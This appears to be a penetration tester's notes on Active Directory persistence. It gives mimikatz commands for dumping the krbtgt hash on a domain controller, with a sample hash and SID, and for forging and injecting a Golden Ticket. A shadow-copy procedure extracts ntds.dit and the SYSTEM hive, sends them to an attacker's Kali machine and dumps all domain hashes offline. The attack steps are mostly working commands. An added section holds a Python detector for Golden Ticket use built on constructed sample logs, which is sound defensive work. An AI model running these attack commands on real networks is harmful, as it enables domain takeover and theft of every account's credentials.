Persistence

Golden Tickets

1. Run mimikatz.exe on the DC

C:\Tools\mimikatz.exe

2. Enable SeDebugPrivilege

privilege::debug

3. Dump the NTLM hashes

lsadump::lsa /patch

4. Retrieve the Domain SID and the krbtgt NTLM hash from the output

EXAMPLE:

Domain : CORP / S-1-5-21-1987370270-658905905-1781884369

RID : 000001f6 (502) User : krbtgt LM : NTLM : 1693c6cefafffc7af11ef34d1c788f47

5. Run mimikatz.exe on a domain machine

C:\Tools\mimikatz.exe

6. Enable SeDebugPrivilege

privilege::debug

7. Delete all cached Kerberos tickets

kerberos::purge

8. Craft the Golden Ticket and inject it into the current session (/ptt)

kerberos::golden /user:<Username> /domain:<Domain Name> /sid:<Domain SID> /krbtgt:<krbtgt NTLM Hash> /ptt

9. Launch a new command prompt

misc::cmd

10. Check whether the DC is now accessible

C:\Tools\SysinternalsSuite\PsExec.exe \\<Domain Controller Hostname> cmd
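Added detection-side example, not part of the original notes: because the forged TGT is injected locally (step 8) and never issued by the KDC, the DC's first record of it is a 4769 service-ticket request with no preceding 4768 TGT request for that account from that host; a TGT built from the krbtgt NTLM hash is RC4-encrypted, which commonly surfaces as ticket encryption type 0x17 where AES is otherwise in use. The event records, account names, addresses and time window below are constructed sample data.

```python
"""Flag 4769 (TGS request) events with no preceding 4768 (TGT request).

Heuristic for Golden Ticket use: the KDC logs 4768 when it issues a TGT, so a
TGT that was forged and injected on the client has no 4768 behind it. A ticket
encryption type of 0x17 (RC4-HMAC) is treated as a secondary indicator.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
WINDOW = timedelta(hours=10)  # default maximum TGT lifetime in AD

# Constructed sample records, not real telemetry.
EVENTS = [
    {"time": "2024-05-01T08:00:00", "id": 4768, "account": "alice", "ip": "10.0.0.5", "etype": "0x12"},
    {"time": "2024-05-01T08:01:00", "id": 4769, "account": "alice", "ip": "10.0.0.5", "etype": "0x12"},
    {"time": "2024-05-01T09:00:00", "id": 4769, "account": "Administrator", "ip": "10.0.0.77", "etype": "0x17"},
    {"time": "2024-05-01T09:30:00", "id": 4769, "account": "bob", "ip": "10.0.0.9", "etype": "0x12"},
]


def find_suspicious_tgs(events):
    """Return 4769 records whose (account, client IP) has no 4768 within WINDOW,
    or whose service ticket was issued with RC4. Each finding carries its reasons."""
    tgt_seen = defaultdict(list)  # (account, ip) -> list of 4768 timestamps
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["account"].lower(), ev["ip"])
        if ev["id"] == 4768:
            tgt_seen[key].append(t)
        elif ev["id"] == 4769:
            reasons = []
            if not any(t - seen <= WINDOW for seen in tgt_seen[key]):
                reasons.append("TGS request without prior TGT request")
            if ev["etype"] == RC4_HMAC:
                reasons.append("RC4 ticket encryption")
            if reasons:
                findings.append({**ev, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_tgs(EVENTS):
        print(hit["time"], hit["account"], hit["ip"], "; ".join(hit["reasons"]))
```

In a real environment the 4768 and 4769 for one session may be logged by different DCs, so the correlation must run over the merged logs of all domain controllers.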

Shadow Copies

1. Run the following in an elevated command prompt to create a shadow copy of C:

C:\Tools\vshadow.exe -nw -p C:

2. Copy the database out of the shadow copy to the C:\ drive

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak

3. Save the SYSTEM hive to the C:\ drive

reg.exe save hklm\system C:\system.bak

4. Send both files to Kali

5. Obtain the hashes offline

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL